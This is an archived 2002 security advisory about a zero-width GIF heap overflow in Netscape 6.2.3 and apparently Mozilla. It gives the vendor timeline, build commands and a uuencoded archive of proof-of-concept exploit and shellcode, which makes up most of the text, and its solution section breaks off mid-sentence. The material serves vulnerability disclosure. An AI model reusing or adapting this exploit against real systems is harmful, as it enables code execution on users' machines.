TUCoPS :: Browsers :: nscp5671.htm

Netscape zero width GIF buffer overflow
9th Sep 2002 [SBWID-5671]
COMMAND

	
		Mozilla/Netscape zero width GIF buffer overflow
	
	

SYSTEMS AFFECTED

	
		 Netscape 6.2.3

		 Mozilla 1.0?
	
	

PROBLEM

	
		zen-parse [zen-parse@gmx.net] says :
		

		Zero width GIF file can cause exploitable  heap  corruption.  (Or:  "Why
		not to use a graphical browser")
		

		Vendor contacted:		17 Jul 2002

		Internally patched:		19 Jul 2002 (according to changelog)

		Received notification of patch: 29 Aug 2002 (via email)

		

		http://crash.ihug.co.nz/~Sneuro/zerogif/

		

		Contains an example exploit for  malformed  GIFs  under  Netscape  6.2.3
		Also affects a number of other browsers, including Mozilla  (of  course)
		and manages to kill Opera.
		

		Example exploit (when it works properly) should create ~/.mashrc with  a
		sample replacement for ~/.bashrc.
		

		Certain values  in  'generic.c'  and  possibly  other  files  will  need
		changing depending on library addresses.
		

		Comments in pngshellcode.c are related to another exploit  for  Netscape
		6.2.3... once I found one way to get data into known locations,  I  kept
		it.
		

		Certain utilities (pnmtopng and ppmtogif) called by these  programs  are
		in the netpbm-progs package.
		

		$ make pngshellcode; ./pngshellcode

		$ make create; ./create

		$ make generic; ./generic

		

		These commands will make the shellcode and the gif file.
		

		This exploit is extremely "Proof  of  Concept"  code.  Sorry  about  the
		system() calls.
		

		UUencoded archive :
		

		begin 644 how-it-works.tgz

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

		;F*BX1OJMT_.7]M)>VDO[G[5_`4]DH`P`*```

		`

		end

		2457 bytes

		
	
	

SOLUTION

	
		This issue is patched in Netscape 7.0 and latest version of Mozilla.
		

		There are a few other  exploitable  issues  patched  in  Netscape  6.2.3
		relating to other image formats.
		

		I expect (hope for?) an advisory from Netscape at some  point  soon  for

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH